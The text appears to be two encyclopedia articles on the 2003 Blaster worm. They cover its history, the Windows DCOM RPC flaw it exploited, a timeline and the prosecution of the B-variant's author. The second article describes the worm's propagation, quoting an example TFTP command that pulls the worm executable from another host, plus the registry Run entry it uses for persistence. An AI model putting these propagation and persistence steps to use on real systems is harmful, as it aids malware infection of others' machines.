Wikipedia
Blaster (computer worm)
View on Wikipedia| Blaster | |
|---|---|
| Technical name | As Blaster
As Lovsan As MSBLAST
|
| Hex dump of the Blaster worm, showing a message left for Microsoft founder Bill Gates by the programmer | |
| Alias | Lovsan, Lovesan, MSBlast |
| Type | Worm |
| Isolation date | 2004 |
| Origin | Minnesota (B variant only) |
| Authors | Jeffrey Lee Parson (B variant only) |
| Technical details | |
| Platform | Windows XP and Windows 2000 |
| Ports used | Remote Procedure Call |
Blaster (also known as Lovsan, Lovesan, or MSBlast) was a computer worm that spread on computers running operating systems Windows XP and Windows 2000 during August 2003.[1]
The worm was first noticed and started spreading on August 11, 2003. The rate that it spread increased until the number of infections peaked on August 13, 2003. Once a network (such as a company or university) was infected, it spread more quickly within the network because firewalls typically did not prevent internal machines from using a certain port.[2] Filtering by ISPs and widespread publicity about the worm curbed the spread of Blaster.
In September 2003, Jeffrey Lee Parson, an 18-year-old from Hopkins, Minnesota, was indicted for creating the B variant of the Blaster worm; he admitted responsibility and was sentenced to an 18-month prison term in January 2005.[3] The author of the original A variant remains unknown.
Creation and effects
[edit]According to court papers, the original Blaster was created after security researchers from the Chinese group Xfocus reverse engineered the original Microsoft patch that allowed for execution of the attack.[4]
The worm spreads by exploiting a buffer overflow discovered by the Polish security research group Last Stage of Delirium[5] in the DCOM RPC service on the affected operating systems, for which a patch had been released one month earlier in MS03-026[6] (CVE-2003-0352) and later in MS03-039.[7] This allowed the worm to spread without users opening attachments simply by spamming itself to large numbers of random IP addresses. Four versions have been detected in the wild.[8] These are the most well-known exploits of the original flaw in RPC, but there were in fact another 12 different vulnerabilities that did not see as much media attention.[9]
The worm was programmed to start a SYN flood against port 80 of windowsupdate.com if the system date is after August 15 and before December 31 and after the 15th day of other months, thereby creating a distributed denial of service attack (DDoS) against the site.[8] The damage to Microsoft was minimal as the site targeted was windowsupdate.com, rather than windowsupdate.microsoft.com, to which the former was redirected. Microsoft temporarily shut down the targeted site to minimize potential effects from the worm.[citation needed]
The worm's executable, MSBlast.exe,[10] contains two messages. The first reads:
I just want to say LOVE YOU SAN!!
This message gave the worm the alternative name of Lovesan. The second reads:
billy gates why do you make this possible ? Stop making money
and fix your software!!
This is a message to Bill Gates, the co-founder of Microsoft and the target of the worm.
The worm also creates the following registry entry so that it is launched every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ windows auto update=msblast.exe
Timeline
[edit]- May 28, 2003: Microsoft releases a patch that would protect users from an exploit in WebDAV that Welchia used. (Welchia used the same exploit as MSBlast but had an additional method of propagation that was fixed in this patch. This method was only used after 200,000 RPC DCOM attacks - the form that MSBlast used.)[11][12]
- July 5, 2003: Timestamp for the patch that Microsoft releases on the 16th.[2]
- July 16, 2003: Microsoft releases a patch that would protect users from the yet unknown MSBlast. At the same time they also released a bulletin describing the exploit.[2][13]
- Around July 16, 2003: White hat hackers create proof-of-concept code verifying that the unpatched systems are vulnerable. The code was not released.[5]
- July 17, 2003: CERT/CC releases a warning and suggests blocking port 135.[14]
- July 21, 2003: CERT/CC suggests also blocking ports 139 and 445.[14]
- July 25, 2003: xFocus releases information on how to exploit the RPC bug that Microsoft released the July 16 patch to fix.[15]
- August 1, 2003: The U.S. issues an alert to be on the lookout for malware exploiting the RPC bug.[5]
- Sometime prior to August 11, 2003: Other viruses using the RPC exploit exist.[9]
- August 11, 2003: Original version of the worm appears on the Internet.[16]
- August 11, 2003: Symantec Antivirus releases a rapid release protection update.[8]
- August 11, 2003, evening: Antivirus and security firms issued alerts to run Windows Update.[16]
- August 12, 2003: The number of infected systems is reported at 30,000.[16]
- August 13, 2003: Two new worms appear and begin to spread. (Sophos, a variant of MSBlast and W32/RpcSpybot-A, a totally new worm that used the same exploit)[17]
- August 15, 2003: The number of infected systems is reported at 423,000.[18]
- August 16, 2003: DDoS attack against windowsupdate.com starts. (Largely unsuccessful because that URL is merely a redirect to the real site, windowsupdate.microsoft.com.)[16]
- August 18, 2003: Microsoft issues an alert regarding MSBlast and its variants.[19]
- August 18, 2003: The related helpful worm, Welchia, appears on the internet.[20]
- August 19, 2003: Symantec upgrades their risk assessment of Welchia to "high" (category 4).[21]
- August 25, 2003: McAfee lowers their risk assessment to "Medium".[22]
- August 27, 2003: A potential DDoS attack against HP is discovered in one variant of the worm.[8]
- January 1, 2004: Welchia deletes itself.[20]
- January 13, 2004: Microsoft releases a stand-alone tool to remove the MSBlast worm and its variants.[23]
- February 15, 2004: A variant of the related worm Welchia is discovered on the internet.[24]
- February 26, 2004: Symantec lowers their risk assessment of the Welchia worm to "Low" (category 2).[20]
- March 12, 2004: McAfee lowers their risk assessment to "Low".[22]
- April 21, 2004: A "B" variant is discovered.[22]
- January 28, 2005: The creator of the B variant of MSBlaster is sentenced to 18 months in prison.[25]
Side effects
[edit]Although the worm can only spread on systems running Windows 2000 or Windows XP, it can cause instability in the RPC service on systems running other versions of Windows NT, including Windows Server 2003 and Windows XP Professional x64 Edition. In particular, the worm does not spread in Windows Server 2003 because Windows Server 2003 was compiled with the /GS switch, which detected the buffer overflow and shut the RPCSS process down.[26]
When infection occurs, the buffer overflow causes the RPC service to crash, leading Windows to display the following message and then automatically reboot, usually after 60 seconds.[27]
System Shutdown:
This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM
Time before shutdown: hours:minutes:seconds
Message:
Windows must now restart because the Remote Procedure Call (RPC) Service terminated unexpectedly.
This was the first indication many users had an infection; it often occurred a few minutes after every startup on compromised machines. A simple resolution to stop countdown is to run the "shutdown /a" command,[28] causing some side effects such as an empty (without users) Welcome Screen.[29] The Welchia worm had a similar effect. Months later, the Sasser worm surfaced, which caused a similar message to appear.
See also
[edit]References
[edit]- ^ "CERT Advisory CA-2003-20: W32/Blaster worm". CERT/CC. 2003-08-14. Archived from the original on 2014-10-17. Retrieved 2018-11-03.
- ^ a b c "MS03-026: Buffer Overrun in RPC May Allow Code Execution". Microsoft Support. Microsoft Corporation. Retrieved 2018-11-03.
- ^ "Minnesota Man Sentenced to 18 Months in Prison for Creating and Unleashing a Variant of the MS Blaster Computer Worm". United States Department of Justice. 2005-01-28. Retrieved 2021-02-17.
- ^ Thomson, Iain (2003-09-01). "FBI arrests 'stupid' Blaster.B suspect". vnunet.com. Archived from the original on 2008-11-01. Retrieved 2018-11-03.
- ^ a b c "MSBlast W32.Blaster.Worm / LovSan :: removal instructions". able2know.org. 2003-08-12. Retrieved 2018-11-03.
- ^ "Microsoft Security Bulletin MS03-026 - Critical". learn.microsoft.com. 1 March 2023.
- ^ "Microsoft Security Bulletin MS03-039 - Critical". learn.microsoft.com. 1 March 2023.
- ^ a b c d "W32.Blaster.Worm". Symantec. 2003-12-09. Archived from the original on May 17, 2018. Retrieved 2018-11-03.
- ^ a b "The Lifecycle of a Vulnerability" (PDF). internet Security Systems, Inc. 2005. Archived from the original (PDF) on 2016-12-24. Retrieved 2018-11-03.
- ^ "Worm:Win32/Msblast.A". Microsoft Corporation. Retrieved 2018-11-03.
- ^ Bransfield, Gene (2003-12-18). "The Welchia Worm" (PDF). pp. 14, 17. Retrieved 2018-11-03.
- ^ "Buffer Overrun in Windows Kernel Message Handling could Lead to Elevated Privileges (811493)". Retrieved 2018-11-03.
- ^ "Flaw In Microsoft Windows RPC Implementation". 2003-07-16. Archived from the original on 2016-03-04.
- ^ a b "Buffer Overflow in Microsoft RPC". 2003-08-08. Archived from the original on 2014-07-15. Retrieved 2018-11-03.
- ^ "The Analysis of LSD's Buffer Overrun in Windows RPC Interface". 2003-07-25. Archived from the original on 2018-02-17. Retrieved 2018-11-03.
- ^ a b c d Roberts, Paul F. (2003-08-12). "Blaster worm spreading, experts warn of attack". InfoWorld. Retrieved 2018-11-03.
- ^ Roberts, Paul F. (2003-08-13). "New Blaster worm variant on the loose". InfoWorld. Retrieved 2018-11-03.
- ^ Roberts, Paul F. (2003-08-18). "Blaster worm attack a bust". InfoWorld. Retrieved 2018-11-03.
- ^ "Virus alert about the Blaster worm and its variants". Microsoft Support. Microsoft Corporation. Retrieved 2018-11-03.
- ^ a b c "W32.Welchia.Worm". Symantec. 2017-08-11. Archived from the original on September 3, 2018. Retrieved 2018-11-03.
- ^ Naraine, Ryan (2003-08-19). "'Friendly' Welchia Worm Wreaking Havoc". InternetNews.com. Retrieved 2018-11-03.
- ^ a b c "Virus Profile: W32/Lovsan.worm.a". McAfee. 2003-08-11. Retrieved 2018-11-03.
- ^ "A tool is available to remove Blaster worm and Nachi worm infections from computers that are running Windows 2000 or Windows XP". Microsoft Support. Microsoft Corporation. Archived from the original on 2014-08-06. Retrieved 2018-11-03.
- ^ "W32.Welchia.C.Worm". Symantec. 2007-02-13. Archived from the original on November 3, 2018. Retrieved 2018-11-03.
- ^ "Minnesota Man Sentenced to 18 Months in Prison for Creating and Unleashing a Variant of the MS Blaster Computer Worm". 2005-01-28. Archived from the original on 2014-07-14. Retrieved 2018-11-03.
- ^ Howard, Michael (2004-05-23). "Why Blaster did not infect Windows Server 2003". Microsoft Developer. Microsoft Corporation. Retrieved 2018-11-03.
- ^ "Worm_MSBlast.A". TrendMicro.com. Retrieved 2018-11-03.
- ^ "Blaster Worm-Virus or Its Variants Cause the Computer to Shutdown with an NT AUTHORITY\SYSTEM Error Message Regarding Remote Procedure Call (RPC) Service". HP Consumer Support. HP. Archived from the original on 2014-11-10. Retrieved 2018-11-03.
- ^ "Blaster Worm". Techopedia. 6 September 2011. Retrieved 2018-11-03.
Grokipedia
Blaster (computer worm)
View on GrokipediaOverview
Discovery and Naming
The Blaster worm was first detected on August 11, 2003, when an infected home user's connection to a corporate VPN triggered rapid scanning and infection attempts, alerting network security sensors within minutes.[4] Antivirus researchers at Symantec were among the initial responders, issuing an advisory that morning describing the threat and initiating global protections.[4] Microsoft Product Support Services also received reports of the worm on the same day, prompting an immediate investigation by their security team.[3] Symantec formally named the malware W32.Blaster.Worm, reflecting its Windows-specific targeting and worm-like propagation.[4] Other security vendors adopted similar but varied nomenclature, leading to alternative names including Lovsan (McAfee), Lovesan (F-Secure), MSBlast (common shorthand), and W32/Blaster (Panda Software).[4][3] These designations highlighted the worm's playful or mocking elements, such as its internal reference to "I just want to say LOVE YOU SAN" in some code variants. Blaster is classified as a network-spreading computer worm, characterized by its self-propagating code that exploits a buffer overflow vulnerability in Microsoft's Distributed Component Object Model Remote Procedure Call (DCOM RPC) interface to infect unpatched systems automatically over TCP/IP connections.[4] This blended threat combined worm replication with remote code execution, distinguishing it from traditional viruses by not requiring user interaction for spread.[4] The creator of the original strain remains unidentified, though a variant (Blaster.B) was later attributed to Jeffrey Lee Parson, an 18-year-old from Minnesota arrested in 2003.[9]Affected Systems and Vulnerability
The Blaster worm primarily targeted unpatched installations of Windows XP, including both Home and Professional editions, as well as Windows 2000 Professional and Server editions.[10][4] These systems were selected due to their widespread use and the worm's specific exploitation code tailored to their RPC implementations.[10] Secondary risks existed for systems running Windows NT 4.0 and Windows Server 2003, which shared similar RPC interfaces vulnerable to the same underlying flaw, though the worm's propagation routine did not actively target them.[10][11] The core vulnerability exploited was a buffer overflow in the Distributed Component Object Model (DCOM) interface of the Remote Procedure Call (RPC) service, designated as CVE-2003-0352.[11][1] This flaw occurred due to improper validation of malformed RPC activation requests, enabling remote attackers to overflow a buffer and execute arbitrary code with Local System privileges.[11][1] Microsoft had released a security patch addressing this vulnerability on July 16, 2003, through Security Bulletin MS03-026 (KB823980), which enhanced DCOM message handling to prevent buffer overruns.[1] The worm's effectiveness thus depended entirely on systems that remained unpatched after this update, highlighting the risks of delayed security maintenance.[1][10]Technical Analysis
Propagation Mechanism
The Blaster worm employs a network-based propagation strategy, scanning for potential targets exclusively over TCP connections without relying on email attachments, file-sharing services, or other non-network vectors. It initiates infection by generating target IP addresses, with approximately 60% selected randomly across the IPv4 space and 40% derived from the local subnet by fixing the first three octets of the infected host's IP and varying the fourth octet from 0 to 254. Multiple threads—typically 20—perform sequential scans of up to 254 addresses from each starting point, probing TCP port 135 to identify systems listening for RPC communications. This port scanning behavior targets unpatched Windows hosts susceptible to the DCOM RPC vulnerability described in Microsoft Security Bulletin MS03-026.[12][4][13] Upon establishing a connection to an open port 135, the worm sends specially crafted, oversized RPC request packets designed to trigger a buffer overflow in the target's DCOM interface. These packets include an RPC bind command followed by a malformed request containing shellcode, which exploits the vulnerability by overflowing a fixed-size buffer in the RPCSS service, allowing arbitrary code execution with Local System privileges. The shellcode, embedded within the exploit payload, is tailored for either Windows 2000 or XP with an 80% bias toward Windows XP and 20% toward Windows 2000 in the worm's attempts, and it immediately facilitates the transfer of the full worm executable. Specifically, the shellcode binds a command shell to TCP port 4444 on the target, enabling the infecting host to connect and issue commands for downloading the worm body.[13][4][5] The download process utilizes the Trivial File Transfer Protocol (TFTP) to retrieve the worm's main executable, msblast.exe, from the infected source machine, which acts as a TFTP server on UDP port 69 while leveraging the shell on port 4444 to execute the transfer command on the target. The target system requests the file via a TFTP client initiated through the shell (e.g., a command liketftp -i [source_IP] get msblast.exe), saving it to the %Windir%\system32 directory, typically C:\Windows\system32\msblast.exe. Once downloaded, the shellcode executes msblast.exe, completing the initial infection. This method ensures rapid, automated replication without user interaction.[4][12][5]
For persistence across reboots, the worm self-replicates by copying msblast.exe to the %Windir%\system32 folder if not already present and modifying the Windows registry to ensure automatic execution on startup. It adds a value named "windows auto update" with data "msblast.exe" under the key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, causing the operating system to launch the worm during each boot sequence. This registry modification, combined with the file placement in a critical system directory, allows the worm to resume scanning and propagation activities immediately after system restarts. The entire process—from scanning to persistence—is contained within the worm's codebase, making it a self-sustaining network parasite reliant solely on the exploited RPC vulnerability for spread.[4][12]
